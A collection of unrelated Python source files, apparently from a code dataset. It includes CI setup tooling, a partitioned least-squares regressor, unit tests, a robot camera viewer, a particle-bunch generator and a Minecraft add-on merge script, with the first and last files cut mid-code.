try:
rc = query_graylog(m, v)
except BaseException as e:
logger.error('graylog query failed: ' + str(e))
create_n_tag(m, test_case['Event']['id'], conf_tag_prefix + 'roll-back error with graylog result poll', '#aa0000')
return
if rc > 0:
if k in wait_vm:
wait_vm.remove(k)
logger.debug(str(len(wait_vm)) + ' left...')
wait_sec -= conf_poll_sleep_interval_sec
if wait_sec <= 0:
break
time.sleep(conf_poll_sleep_interval_sec)
return
|
nilq/baby-python
|
python
|
# (C) Datadog, Inc. 2019-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
import platform
import stat
import subprocess
import click
import requests
from ....fs import ensure_parent_dir_exists
from ...constants import get_root
from ...testing import get_test_envs
from ..console import CONTEXT_SETTINGS, echo_debug, echo_info
COMPOSE_VERSION = 'v2.5.0'
COMPOSE_RELEASES_URL = f'https://github.com/docker/compose/releases/download/{COMPOSE_VERSION}/'
def upgrade_docker_compose(platform_name):
if platform_name == 'windows':
artifact_name = 'docker-compose-windows-x86_64.exe'
executable_name = 'docker-compose.exe'
else:
artifact_name = 'docker-compose-linux-x86_64'
executable_name = 'docker-compose'
executable_path = os.path.join(os.path.expanduser('~'), '.docker', 'cli-plugins', executable_name)
ensure_parent_dir_exists(executable_path)
response = requests.get(COMPOSE_RELEASES_URL + artifact_name)
response.raise_for_status()
with open(executable_path, 'wb') as f:
for chunk in response.iter_content(16384):
f.write(chunk)
f.flush()
if platform_name != 'windows':
os.chmod(executable_path, os.stat(executable_path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
def display_action(script_file):
display_header = f'Running: {script_file}'
echo_info(f'\n{display_header}\n{"-" * len(display_header)}\n')
@click.command(context_settings=CONTEXT_SETTINGS, short_help='Run CI setup scripts')
@click.argument('checks', nargs=-1)
@click.option('--changed', is_flag=True, help='Only target changed checks')
def setup(checks, changed):
"""
Run CI setup scripts
"""
cur_platform = platform.system().lower()
upgrade_docker_compose(cur_platform)
scripts_path = os.path.join(get_root(), '.azure-pipelines', 'scripts')
echo_info("Run CI setup scripts")
if checks:
if checks[0] == 'skip':
echo_info('Skipping set up')
else:
echo_info(f'Checks chosen: {", ".join(checks)}')
else:
echo_info('Checks chosen: changed')
check_envs = list(get_test_envs(checks, every=True, sort=True, changed_only=changed))
echo_info(f'Configuring these envs: {check_envs}')
for check, _ in check_envs:
check_scripts_path = os.path.join(scripts_path, check)
if not os.path.isdir(check_scripts_path):
echo_debug(f"Skip! No scripts for check `{check}` at: `{check_scripts_path}`")
continue
contents = os.listdir(check_scripts_path)
if cur_platform not in contents:
echo_debug(f"Skip! No scripts for check `{check}` and platform `{cur_platform}`")
continue
setup_files = sorted(os.listdir(os.path.join(check_scripts_path, cur_platform)))
scripts = [s for s in setup_files if not s.startswith("_")]
non_exe = [s for s in setup_files if s.startswith("_")]
non_exe_msg = f" (Non-executable setup files: {non_exe})" if non_exe else ""
echo_info(f'Setting up: {check} with these config scripts: {scripts}{non_exe_msg}')
for script in scripts:
script_file = os.path.join(check_scripts_path, cur_platform, script)
display_action(script_file)
cmd = [script_file]
if script_file.endswith('.py'):
cmd.insert(0, 'python')
subprocess.run(cmd, shell=True, check=True)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""
Partitioned Least Square class
Developer:
Omar Billotti
Description:
Partitioned Least Square class
"""
from numpy import shape, zeros, hstack, ones, vstack, sum as sum_elements, array, inf, where
from numpy.random import rand
from numpy.linalg import lstsq
from scipy.optimize import nnls
from scipy.linalg import norm
from ._utils import vec1, indextobeta, checkalpha, bmatrix
class PartitionedLs(object):
"""
Partitioned Least Square class
"""
def __init__(self, algorithm="alt"):
"""
Constructor of the Partitioned Least Square class
Parameters
----------
algorithm : string
String selecting the algorithm used to build the model;
possible values are "alt" and "opt".
Returns
-------
None.
"""
self.model = None
self.algorithm = algorithm
def fit(self, x, y, p):
"""
Fits a PartialLS Regression model to the given data
Parameters
----------
x : Matrix
describing the examples
y : Array
vector with the output values for each example
p : Matrix
specifying how to partition the M attributes into K subsets.
P{m,k} should be 1 if attribute number m belongs to partition k
Returns
-------
None.
"""
if self.algorithm == "opt":
self.__fit_opt_nnls(x, y, p)
elif self.algorithm == "alt":
self.__fit_alt_nnls(x, y, p)
else:
self.__fit_alt_nnls(x, y, p)
def __fit_opt_nnls(self, x,
y, p):
"""
Fits a PartialLS OPT Regression model to the given data
Parameters
----------
x : Matrix
describing the examples
y : Array
vector with the output values for each example
p : Matrix
specifying how to partition the M attributes into K subsets.
P{m,k} should be 1 if attribute number m belongs to partition k
Returns
-------
None.
"""
xo = hstack((x, ones((shape(x)[0], 1))))
po = vstack(
(hstack((p, zeros((shape(p)[0], 1)))), vec1(shape(p)[1] + 1)))
k = shape(po)[1]
b_start, results = (-1, [])
for i in range(b_start + 1, 2 ** k):
beta = array(indextobeta(i, k))
xb = bmatrix(xo, po, beta)
alpha = nnls(xb, y)[0]
optval = norm(xo.dot(po * alpha.reshape(-1, 1)).dot(beta) - y)
result = (optval, alpha[:-1], beta[:-1], alpha[-1] * beta[-1], p)
results.append(result)
optvals = [r[0] for r in results]
optindex = optvals.index(min(optvals))
(opt, a, b, t, p) = results[optindex]
A = sum_elements(p * a.reshape(-1, 1), 0)
b = b * A
# substituting all 0.0 with 1.0
for z in where(A == 0.0):
A[z] = 1.0
a = sum_elements((p * a.reshape(-1, 1)) / A, 1)
self.model = (opt, a, b, t, p)
def __fit_alt_nnls(self, x,
y, p,
n=20):
"""
Fits a PartialLS Alt Regression model to the given data
Parameters
----------
x : Matrix N * M
matrix describing the examples
y : vector
vector with the output values for each example
p : Matrix M * K
specifying how to partition the M attributes into K subsets.
P{m,k} should be 1 if attribute number m belongs to partition k
n : int
number of alternating loops to be performed, defaults to 20.
Returns
-------
None.
"""
# Rewriting the problem in homogenous coordinates
xo = hstack((x, ones((shape(x)[0], 1))))
po = vstack((hstack((p, zeros((shape(p)[0], 1)))),
vec1(shape(p)[1] + 1)))
m, k = shape(po)
alpha = rand(m)
beta = (rand(k) - 0.5) * 10
t = rand()
initvals = (0, alpha, beta, t, inf)
i_start, alpha, beta, t, optval = initvals
for i in range(i_start + 1, n):
# nnls problem with fixed beta variables
po_beta = sum_elements(po * beta, 1)
xo_beta = xo * po_beta
alpha = nnls(xo_beta, y)[0]
alpha = checkalpha(alpha, po)
sum_alpha = sum_elements(po * alpha.reshape(-1, 1), 0)
po_alpha = sum_elements(po * sum_alpha, 1)
alpha = alpha / po_alpha
beta = beta * sum_alpha
# ls problem with fixed alpha variables
xo_alpha = xo.dot(po * alpha.reshape(-1, 1))
beta = lstsq(xo_alpha, y, rcond=None)[0]
optval = norm(xo.dot(po * alpha.reshape(-1, 1)).dot(beta) - y, 2)
self.model = (optval, alpha[:-1], beta[:-1], alpha[-1] * beta[-1], p)
def predict(self, x):
"""
Description
Predicts points using the formula: f(X) = X * (P .* a) * b + t.
Parameters
----------
x : Matrix N * M
matrix describing the examples
Returns
-------
out : Array
contains the predictions of the given model on examples in X
"""
(_, alpha, beta, t, p) = self.model
return array(x).dot(p * alpha.reshape(-1, 1)).dot(beta) + t
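# Hedged usage sketch (added; not part of the original module, values are
# illustrative and assume the package's relative imports resolve normally):
#
#   from numpy import array
#   X = array([[1.0, 2.0], [2.0, 1.0], [3.0, 4.0], [4.0, 3.0]])
#   y = array([3.0, 3.0, 7.0, 7.0])
#   P = array([[1], [1]])      # both attributes belong to partition 0 (M=2, K=1)
#   model = PartitionedLs(algorithm='alt')
#   model.fit(X, y, P)
#   print(model.predict(X))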
|
nilq/baby-python
|
python
|
import logging
from source.bridgeLogger import configureLogging
from nose2.tools.such import helper as assert_helper
def test_case01():
with assert_helper.assertRaises(TypeError):
configureLogging()
def test_case02():
with assert_helper.assertRaises(TypeError):
configureLogging('/tmp')
def test_case03():
with assert_helper.assertRaises(TypeError):
configureLogging(None, 'myLog')
def test_case04():
result = configureLogging('/tmp', 'mylog', 'abc')
assert isinstance(result, logging.Logger)
def test_case05():
result = configureLogging('/tmp', None, 'abc')
assert isinstance(result, logging.Logger)
def test_case06():
result = configureLogging('/tmp', None)
assert isinstance(result, logging.Logger)
|
nilq/baby-python
|
python
|
import unittest
from imdb_app_data.moviemodel import MovieModel
from imdb_app_logic.movie_scraper import MovieScraper
from imdb_app_logic.ratingcalculator import RatingCalculator
class Test(unittest.TestCase):
def test_scraper(self):
scraper = MovieScraper()
scraper.get_movie_list()
#self.assertIsNotNone(scraper.topmovies)
self.assertTrue(len(scraper.topmovies) == 20)
def test_oscar_calculator(self):
test_movie = MovieModel(1,"TEST",5,20000,2,"TEST")
test_list = [test_movie]
rc = RatingCalculator()
rc.calculate_oscar_rating(test_list)
self.assertTrue(test_list[0].adjusted_rating == 5.3)
def test_review_penalizer(self):
test_movie = MovieModel(1,"TEST",5,200000,2,"TEST")
test_list = [test_movie]
rc = RatingCalculator()
rc.maxreviews = 500000
rc.review_penalizer(test_list)
self.assertTrue(test_list[0].adjusted_rating == 4.7)
if __name__ == "__main__":
unittest.main()
# python -m unittest unit_tests.py
|
nilq/baby-python
|
python
|
from docker import DockerClient
from pytest import fixture
from yellowbox.clients import open_docker_client
@fixture(scope="session")
def docker_client() -> DockerClient:
with open_docker_client() as client:
yield client
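# Hedged usage sketch (added; not part of the original module): a test that
# consumes the session-scoped fixture above; DockerClient.ping() is a standard
# docker SDK call that returns True when the daemon is reachable.
def test_docker_daemon_reachable(docker_client: DockerClient):
    assert docker_client.ping()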
|
nilq/baby-python
|
python
|
def flow_control(k):
if (k == 0):
s = "Variable k = %d equals 0." % k
elif (k == 1):
s = "Variable k = %d equals 1." % k
else:
s = "Variable k = %d does not equal 0 or 1." % k
print(s)
def main():
i = 0
flow_control(i)
i = 1
flow_control(i)
i = 2
flow_control(i)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
# Copyright 2012 Philip Chimento
"""Sound the system bell, Qt implementation."""
from pyface.qt import QtGui
def beep():
"""Sound the system bell."""
QtGui.QApplication.beep()
|
nilq/baby-python
|
python
|
"""
agenda:
1. speedup visualize_result
2. grouping labels
speed bottlenecks:
1. colorEncoding
results:
1. with visualize_result optimize: 0.045s --> 0.002s
2. with grouping labels: 0.002s --> 0.002-0.003s
"""
import os
import sys
import time
PATH = os.path.join(os.getcwd(), '..')
sys.path.append(PATH)
import csv
import numpy as np
import torch
from torchvision import transforms
import cv2
from img_utils import ImageLoad_cv2
from scipy.io import loadmat
from utils import colorEncode
from inference import predict, setup_model
from lib.utils import as_numpy
from profiler import profile
from idx_utils import create_idx_group, edit_colors_names_group
def preprocess():
WIDTH = 484
HEIGHT = 240
ENSEMBLE_N = 3
# GET COLOR ENCODING AND ITS INDEX MAPPING
colors = loadmat('../data/color150.mat')['colors']
root = '..'
names = {}
with open('../data/object150_info.csv') as f:
reader = csv.reader(f)
next(reader)
for row in reader:
names[int(row[0])] = row[5].split(";")[0]
idx_map = create_idx_group()
colors, names = edit_colors_names_group(colors, names)
# SETUP MODEL
cfg_path = os.path.join('..', 'config', 'ade20k-mobilenetv2dilated-c1_deepsup.yaml')
#cfg_path="config/ade20k-resnet18dilated-ppm_deepsup.yaml"
model = setup_model(cfg_path, root, gpu=0)
model.eval()
# GET DATA AND PROCESS IMAGE
data = np.load(os.path.join('..', 'test_set', 'cls1_rgb.npy'))
data = data[:, :, ::-1]
img = ImageLoad_cv2(data, WIDTH, HEIGHT, ENSEMBLE_N, True)
# MODEL FEED
predictions = predict(model, img, ENSEMBLE_N, gpu = 0, is_silent = False)
return predictions, colors, names, idx_map
def process_predict_bad(scores, colors, names, idx_map, is_silent):
"""
colorEncode is used
input:
the predictions of model
output:
the colorized predictions
"""
_, pred = torch.max(scores, dim=1)
pred = as_numpy(pred.squeeze(0).cpu()) # shape of pred is (height, width)
#The predictions for infering distance
#seg = np.moveaxis(pred, 0, -1)
pred = idx_map[pred]
pred = np.int32(pred)
pred_color = colorEncode(pred, colors).astype(np.uint8)
if is_silent:
return pred_color
pixs = pred.size
uniques, counts = np.unique(pred, return_counts = True)
for idx in np.argsort(counts)[::-1]:
name = names[uniques[idx] + 1]
ratio = counts[idx] / pixs * 100
if ratio > 0.1:
print(" {}: {:.2f}%".format(name, ratio))
return pred_color
def process_predict_good(scores, colors, names, idx_map, is_silent):
"""
replace colorEncode by numpy way
input:
the predictions of model
output:
the colorized predictions
"""
_, pred = torch.max(scores, dim=1)
pred = as_numpy(pred.squeeze(0).cpu()) # shape of pred is (height, width)
#The predictions for infering distance
pred = idx_map[pred]
pred = np.int32(pred)
pred_color = rock_the_colorencoding(pred, colors)
if is_silent:
return pred_color
pixs = pred.size
uniques, counts = np.unique(pred, return_counts = True)
for idx in np.argsort(counts)[::-1]:
name = names[uniques[idx] + 1]
ratio = counts[idx] / pixs * 100
if ratio > 0.1:
print(" {}: {:.2f}%".format(name, ratio))
return pred_color
def rock_the_colorencoding(labelmap, colors):
return colors[labelmap]
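# Note (added): `colors` has shape (n_classes, 3), so indexing it with an
# integer label map of shape (H, W) is a single vectorized numpy lookup that
# broadcasts to an (H, W, 3) color image; this removes the per-label Python
# loop that makes colorEncode the bottleneck measured above.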
if __name__ == '__main__':
# COLOR ENCODING
import matplotlib.pyplot as plt
predictions, colors, names, idx_map = preprocess()
print('Comparing Two Ways of Color Encoding...')
for i in range(5):
# bad: use colorEncode
torch.cuda.synchronize()
start = time.time()
pred_color_orig = process_predict_bad(predictions, colors, names, idx_map, is_silent = True)
torch.cuda.synchronize()
end = time.time()
print('Original Runtime: {}s'.format(end - start))
# good: replace by numpy lookup
torch.cuda.synchronize()
start = time.time()
pred_color_gd = process_predict_good(predictions, colors, names, idx_map, is_silent = True)
torch.cuda.synchronize()
end = time.time()
print('Improved Runtime: {}s'.format(end - start))
assert (pred_color_gd == pred_color_orig).all(), 'SOMETHING WRONG WITH NEW COLOR ENCODING'
plt.imshow(pred_color_gd)
plt.show()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
#--------------------------------------------------------
# The classes will generates bunches for pyORBIT J-PARC linac
# at the entrance of LI_MEBT1 accelerator line (by default)
# It is parallel, but it is not efficient.
#--------------------------------------------------------
import math
import sys
import os
import random
import orbit_mpi
from orbit_mpi import mpi_comm
from orbit_mpi import mpi_datatype
from orbit_mpi import mpi_op
from orbit.bunch_generators import TwissContainer
from orbit.bunch_generators import KVDist2D, KVDist3D
from orbit.bunch_generators import GaussDist2D, GaussDist3D
from orbit.bunch_generators import WaterBagDist2D, WaterBagDist3D
from orbit.bunch_generators import TwissAnalysis
from bunch import Bunch
class JPARC_Linac_BunchGenerator:
"""
Generates the pyORBIT JPARC Linac Bunches.
Twiss parameters have the following units: x in [m], xp in [rad]
and the X and Y emittances are un-normalized. The longitudinal emittance
is in [GeV*m].
"""
def __init__(self,twissX, twissY, twissZ, frequency = 324.0e+6):
self.twiss = (twissX, twissY, twissZ)
self.bunch_frequency = frequency
self.bunch = Bunch()
syncPart = self.bunch.getSyncParticle()
#set H- mass
#self.bunch.mass(0.9382723 + 2*0.000511)
self.bunch.mass(0.939294)
self.bunch.charge(-1.0)
syncPart.kinEnergy(0.003)
self.c = 2.99792458e+8 # speed of light in m/sec
self.beam_current = 40.0 # beam current in mA
self.rf_wave_lenght = self.c/self.bunch_frequency
self.si_e_charge = 1.6021773e-19
def getKinEnergy(self):
"""
Returns the kinetic energy in GeV
"""
return self.bunch.getSyncParticle().kinEnergy()
def setKinEnergy(self, e_kin = 0.003):
"""
Sets the kinetic energy in GeV
"""
self.bunch.getSyncParticle().kinEnergy(e_kin)
def getZtoPhaseCoeff(self,bunch):
"""
Returns the coefficient to calculate phase in degrees from the z-coordinate.
"""
bunch_lambda = bunch.getSyncParticle().beta()*self.rf_wave_lenght
phase_coeff = 360./bunch_lambda
return phase_coeff
def getBeamCurrent(self):
"""
Returns the beam current in mA
"""
return self.beam_current
def setBeamCurrent(self, current):
"""
Sets the beam current in mA
"""
self.beam_current = current
def getBunch(self, nParticles = 0, distributorClass = WaterBagDist3D, cut_off = -1.):
"""
Returns the pyORBIT bunch with particular number of particles.
"""
comm = orbit_mpi.mpi_comm.MPI_COMM_WORLD
rank = orbit_mpi.MPI_Comm_rank(comm)
size = orbit_mpi.MPI_Comm_size(comm)
data_type = mpi_datatype.MPI_DOUBLE
main_rank = 0
bunch = Bunch()
self.bunch.copyEmptyBunchTo(bunch)
macrosize = (self.beam_current*1.0e-3/self.bunch_frequency)
macrosize /= (math.fabs(bunch.charge())*self.si_e_charge)
distributor = None
if(distributorClass == WaterBagDist3D):
distributor = distributorClass(self.twiss[0],self.twiss[1],self.twiss[2])
else:
distributor = distributorClass(self.twiss[0],self.twiss[1],self.twiss[2], cut_off)
bunch.getSyncParticle().time(0.)
for i in range(nParticles):
(x,xp,y,yp,z,dE) = distributor.getCoordinates()
(x,xp,y,yp,z,dE) = orbit_mpi.MPI_Bcast((x,xp,y,yp,z,dE),data_type,main_rank,comm)
if(i%size == rank):
bunch.addParticle(x,xp,y,yp,z,dE)
nParticlesGlobal = bunch.getSizeGlobal()
bunch.macroSize(macrosize/nParticlesGlobal)
return bunch
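# Hedged usage sketch (added; not part of the original class). The Twiss values
# are illustrative only and a working pyORBIT installation is assumed:
#
#   twissX = TwissContainer(alpha=-1.9, beta=0.19, emittance=3.0e-6)
#   twissY = TwissContainer(alpha=1.7, beta=0.17, emittance=3.0e-6)
#   twissZ = TwissContainer(alpha=0.0, beta=0.6, emittance=1.0e-6)
#   bunch_gen = JPARC_Linac_BunchGenerator(twissX, twissY, twissZ)
#   bunch = bunch_gen.getBunch(nParticles=10000, distributorClass=WaterBagDist3D)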
|
nilq/baby-python
|
python
|
import excursion
import excursion.testcases.fast as scandetails
import excursion.optimize
import numpy as np
import logging
def test_2d():
scandetails.truth_functions = [
scandetails.truth,
]
N_INIT = 5
N_UPDATES = 1
N_BATCH = 5
N_DIM = 2
X,y_list, gps = excursion.optimize.init(scandetails, n_init = N_INIT, seed = 1)
index = 0
for index in range(1,N_UPDATES+1):
newX, acqvals = excursion.optimize.gridsearch(gps, X, scandetails, batchsize=N_BATCH)
newys_list = [func(np.asarray(newX)) for func in scandetails.truth_functions]
for i,newys in enumerate(newys_list):
y_list[i] = np.concatenate([y_list[i],newys])
X = np.concatenate([X,newX])
gps = [excursion.get_gp(X,y_list[i]) for i in range(len(scandetails.truth_functions))]
print(X,X.shape)
assert X.shape == (N_INIT + N_BATCH * N_UPDATES,N_DIM)
assert np.allclose(X[0],[6.25533007e-01, 1.08048674e+00])
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
import time
import sys
import zmq
import numpy as np
import pyglet
from ctypes import byref, POINTER
from pyglet.gl import *
from pyglet.window import key
window = pyglet.window.Window(640, 640, style=pyglet.window.Window.WINDOW_STYLE_DIALOG)
def recv_array(socket):
"""
Receive a numpy array over zmq
"""
md = socket.recv_json()
msg = socket.recv(copy=True, track=False)
buf = memoryview(msg)
A = np.frombuffer(buf, dtype=md['dtype'])
A = A.reshape(md['shape'])
return A
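# Hedged counterpart to recv_array (added; not in the original script): send a
# numpy array as a JSON metadata header followed by the raw buffer, the same
# framing recv_array expects.
def send_array(socket, A):
    md = dict(dtype=str(A.dtype), shape=A.shape)
    socket.send_json(md, zmq.SNDMORE)
    socket.send(A, copy=True, track=False)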
def update(dt):
# Get an image from the camera
print('requesting image')
global last_img
socket.send_json({ 'robot': { 'get_image': None }})
last_img = recv_array(socket)
print('img received')
def step(vels, pos=None):
global last_img
req = {
"set_vels": vels,
#"get_image": None
}
if pos is not None:
req['set_pos'] = pos
socket.send_json({"robot": req})
@window.event
def on_key_press(symbol, modifiers):
"""
if symbol == key.BACKSPACE or symbol == key.SLASH:
print('RESET')
env.reset()
env.render('pyglet')
return
"""
if symbol == key.ESCAPE:
sys.exit(0)
@window.event
def on_key_release(symbol, modifiers):
pass
@window.event
def on_draw():
img_height, img_width, _ = last_img.shape
# Draw the human render to the rendering window
img = np.ascontiguousarray(np.flip(last_img, axis=0))
img_data = pyglet.image.ImageData(
img_width,
img_height,
'RGB',
img.ctypes.data_as(POINTER(GLubyte)),
pitch=img_width * 3,
)
img_data.blit(
0,
0,
0,
width=window.width,
height=window.height
)
# Force execution of queued commands
glFlush()
@window.event
def on_close():
pyglet.app.exit()
# Connect to the Gym bridge ROS node
addr_str = "tcp://%s:%s" % ('flogo.local', 5858)
#addr_str = "tcp://%s:%s" % ('localhost', 5858)
print("Connecting to %s ..." % addr_str)
context = zmq.Context()
socket = context.socket(zmq.PAIR)
socket.connect(addr_str)
last_img = np.zeros(shape=(64, 64, 3), dtype=np.uint8)
last_img[:, :, 0] = 255
pyglet.clock.schedule_interval(update, 1/30.0)
pyglet.app.run()
|
nilq/baby-python
|
python
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.mainpage_sec, name='index'),
path('authorize_ingress_sec', views.authorize_ingress_sec, name='authorize_ingress'),
path('revoke_ingress_sec', views.revoke_ingress_sec, name='revoke_ingress')
]
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Block',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1000, verbose_name='\u540d\u5b57')),
('desc', models.CharField(max_length=1000, verbose_name='\u63cf\u8ff0')),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
('manger', models.ForeignKey(verbose_name='\u7ba1\u7406\u5458', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': '\u677f\u5757',
'verbose_name_plural': '\u677f\u5757',
},
),
]
|
nilq/baby-python
|
python
|
import json
import os
import shutil
from os import listdir
from os import path
from os.path import isfile, join
from zipfile import ZipFile
from shutil import copyfile
from glob import glob
import ntpath
import threading
import re
def find_all(name, path):
result = []
for root, dirs, files in os.walk(path):
if name in files:
result.append(os.path.join(root, name))
return result
def addDeathCounter(path_to_bp):
copy_ac(path_to_bp,"death_counter_j5cfmnkccwt7ppim3lsyue.json")
copy_animation(path_to_bp,"death_counter_start_j5cfmnkccwt7ppim3lsyue.json")
add_a_c_to_player(path_to_bp,
"controller.animation.death_counter_j5cfmnkccwt7ppim3lsyue",
"death_counter_j5cfmnkccwt7ppim3lsyue")
add_a_c_to_player(path_to_bp,
"animation.start_death_counter_j5cfmnkccwt7ppim3lsyue",
"start_death_counter_j5cfmnkccwt7ppim3lsyue")
def addWeatherClear(path_to_bp):
copy_ac(path_to_bp,"clear_weather_out_of_bed_njorunnb628pievrfeckwx.json")
add_a_c_to_player(path_to_bp,
"controller.animation.clear_weather_out_of_bed_njorunnb628pievrfeckwx",
"clear_weather_id_out_of_bed_njorunnb628pievrfeckwx")
def addOPS(path_to_bp):
copy_ac(path_to_bp,"one_player_sleep_njorunnb628pievrfeckwx.json")
add_a_c_to_player(path_to_bp,
"controller.animation.one_player_sleep_njorunnb628pievrfeckwx",
"one_player_sleep_njorunnb628pievrfeckwx")
def copy_ac(path_to_bp,ac_name):
path_to_a_c=join(path_to_bp,"animation_controllers")
if not(os.path.isdir(path_to_a_c)):
os.mkdir(path_to_a_c)
copyfile(join("lookups",ac_name),join(path_to_a_c,ac_name))
def copy_animation(path_to_bp,ani_name):
path_to_animations=join(path_to_bp,"animations")
if not(os.path.isdir(path_to_animations)):
os.mkdir(path_to_animations)
copyfile(join("lookups",ani_name),join(path_to_animations,ani_name))
def add_a_c_to_player(path_to_bp,a_c_handle,ac_common_handle,addtoscript=True):
result = [y for x in os.walk(path_to_bp) for y in glob(os.path.join(x[0], '*.json'))]
found=False
for file in result:
print(file)
with open(file, 'r+') as f:
data=""
for line in f:
data+=line
data = re.sub(r"//[^\n]*\n", '', data)
data = json.loads(data)
if type(data) is dict:
if "minecraft:entity" in data.keys():
if data["minecraft:entity"]["description"]["identifier"]=="minecraft:player":
found=True
if "scripts" not in data["minecraft:entity"]["description"].keys() and addtoscript:
data["minecraft:entity"]["description"]["scripts"]={"animate":[]}
if "animations" not in data["minecraft:entity"]["description"].keys():
data["minecraft:entity"]["description"]["animations"]={}
if addtoscript:
data["minecraft:entity"]["description"]["scripts"]["animate"].append(ac_common_handle)
data["minecraft:entity"]["description"]["animations"][ac_common_handle]=a_c_handle
f.seek(0)
json.dump(data, f, indent=4)
f.truncate()
print(found)
if not found:
path_to_a_c=join(path_to_bp,"entities")
if not(os.path.isdir(path_to_a_c)):
os.mkdir(path_to_a_c)
copyfile(join("lookups","player.json"),join(path_to_a_c,"player.json"))
copy_ac(path_to_bp,"one_player_sleep_njorunnb628pievrfeckwx.json")
def edit_manifests(path_to_bp , packs):
with open(join(path_to_bp,"manifest.json"), 'r+') as f:
data = json.load(f)
data["header"]["description"]+=", modified by a RavinMaddHatters pack merge tool to include: {}".format(packs)
f.seek(0)
json.dump(data, f, indent=4)
f.truncate()
def mergePacks(path,death=False,ops=False,clearWeather=False):
cwd = os.getcwd()
path_to_save="temp"
with ZipFile(path, 'r') as zipObj:
zipObj.extractall(path_to_save)
manifests=find_all("manifest.json",path_to_save)
path_to_bp=""
for mani in manifests:
with open(mani) as f:
packmani = json.load(f)
for sub in packmani["modules"]:
if "data"== sub["type"]:
path_to_bp=os.path.dirname(mani)
pack =""
if clearWeather:
addWeatherClear(path_to_bp)
if death:
addDeathCounter(path_to_bp)
pack+="Death Counter"
if ops:
if len(pack)>0:
pack+=", "
pack+="One player sleep"
addOPS(path_to_bp)
if death or ops:
edit_manifests(path_to_bp,pack)
temp_path=join(cwd,path_to_save)
os.chdir(temp_path)
pack_name=ntpath.basename(path)
file_paths = []
for directory,_,_ in os.walk(temp_path):
files=glob(os.path.join(directory, "*.*"))
for file in files:
print(os.getcwd())
print(file)
file_paths.append(file.replace(os.getcwd()+"\\",""))
with ZipFile(pack_name, 'x') as zip:
for file in file_paths:
print(file)
zip.write(file)
os.chdir(cwd)
copyfile(join(path_to_save,pack_name),"merged_"+pack_name)
shutil.rmtree(path_to_save)
print("packs have been merged and processing is completed, please use merged_"+pack_name)
def loadJsonKillComments(jsonFile):
data=""
with open(jsonFile, 'r+') as f:
for line in f:
data+=line
data = re.sub(r"//[^\n]*\n", '', data)
data = json.loads(data)
return data
def get_recursively(search_dict, field):
"""
Takes a dict with nested lists and dicts,
and searches all dicts for a key of the field
provided.
"""
fields_found = []
keys=[]
for key, value in search_dict.items():
if key == field:
fields_found.append(value)
keys.append([key])
elif isinstance(value, dict):
results,recurKeys = get_recursively(value, field)
for result in results:
fields_found.append(result)
for recurKey in recurKeys:
tempKey=[key]
tempKey+=recurKey
keys.append(tempKey)
elif isinstance(value, list):
for ind in range(len(value)):
item=value[ind]
if isinstance(item, dict):
more_results,more_recurKeys = get_recursively(item, field)
for another_result in more_results:
fields_found.append(another_result)
for more_recurkey in more_recurKeys:
tempKey=[ind]
tempKey+=more_recurkey
keys.append(tempKey)
return fields_found, keys
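# Illustrative, uncalled sketch (the sample dict is hypothetical) showing what
# get_recursively returns: every value stored under the requested key plus the key
# path that led to it (note that list indices replace the parent key for list items).
def _demo_get_recursively():
    sample = {
        "minecraft:entity": {"description": {"identifier": "minecraft:player"}},
        "components": [{"identifier": "custom:thing"}],
    }
    values, paths = get_recursively(sample, "identifier")
    # values -> ["minecraft:player", "custom:thing"]
    # paths  -> [["minecraft:entity", "description", "identifier"], [0, "identifier"]]
    return values, paths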
def check_compatiblity(Base,Cross):
path_to_base="base"
path_to_cross="Cross"
with ZipFile(Base, 'r') as zipObj:
zipObj.extractall(path_to_base)
with ZipFile(Cross, 'r') as zipObj:
zipObj.extractall(path_to_cross)
result = [y for x in os.walk(path_to_base) for y in glob(os.path.join(x[0], '*.json'))]
base_handles=[]
for file in result:
print(file)
data=loadJsonKillComments(file)
try:
fields_found, keys=get_recursively(data,"identifier")
except:
fields_found=[]
keys=[]
base_handles+=fields_found
result2 = [y for x in os.walk(path_to_cross) for y in glob(os.path.join(x[0], '*.json'))]
cross_handles=[]
for file in result2:
print(file)
data=loadJsonKillComments(file)
try:
fields_found, keys=get_recursively(data,"identifier")
except:
fields_found=[]
keys=[]
cross_handles+=fields_found
print(base_handles)
print(cross_handles)
shutil.rmtree(path_to_base)
shutil.rmtree(path_to_cross)
return set(base_handles).intersection(set(cross_handles))
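# Hedged usage sketch (file names are hypothetical): the returned set contains the
# identifiers both packs modify; an empty set suggests they can be merged safely.
def _demo_check_compatiblity():
    overlap = check_compatiblity("base_pack.mcaddon", "other_pack.mcaddon")
    if overlap:
        print("Conflicting identifiers: " + ", ".join(sorted(overlap)))
    else:
        print("No overlapping identifiers found")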
if __name__ == "__main__":
from tkinter import ttk
from tkinter import filedialog
from tkinter import messagebox
from tkinter import StringVar, Button, Label, Entry, Tk, Checkbutton, END, ACTIVE
from tkinter import filedialog, Scale,DoubleVar,HORIZONTAL,IntVar,Listbox, ANCHOR
def browsepack():
#browse for a structure file.
packPath.set(filedialog.askopenfilename(filetypes=(
("addon", "*.mcaddon *.MCADDON *.MCPACK *mcpack"),("zip", "*.zip *.ZIP") )))
def make_pack_from_gui():
mergePacks(packPath.get(),
death=death_counter_check.get(),
ops=ops_counter_check.get(),
clearWeather=clear_counter_check.get())
def crossCheckPacksGui():
base_pack=packPath.get()
if len(base_pack)>0:
cross_pack=(filedialog.askopenfilename(filetypes=(
("Addon to Cross Check", "*.mcaddon *.MCADDON *.MCPACK *.MCPACK" ),("zip", "*.zip *.ZIP") )))
intersections=check_compatiblity(base_pack,cross_pack)
print(intersections)
if len(intersections)!=0:
printInt="\n".join(intersections)
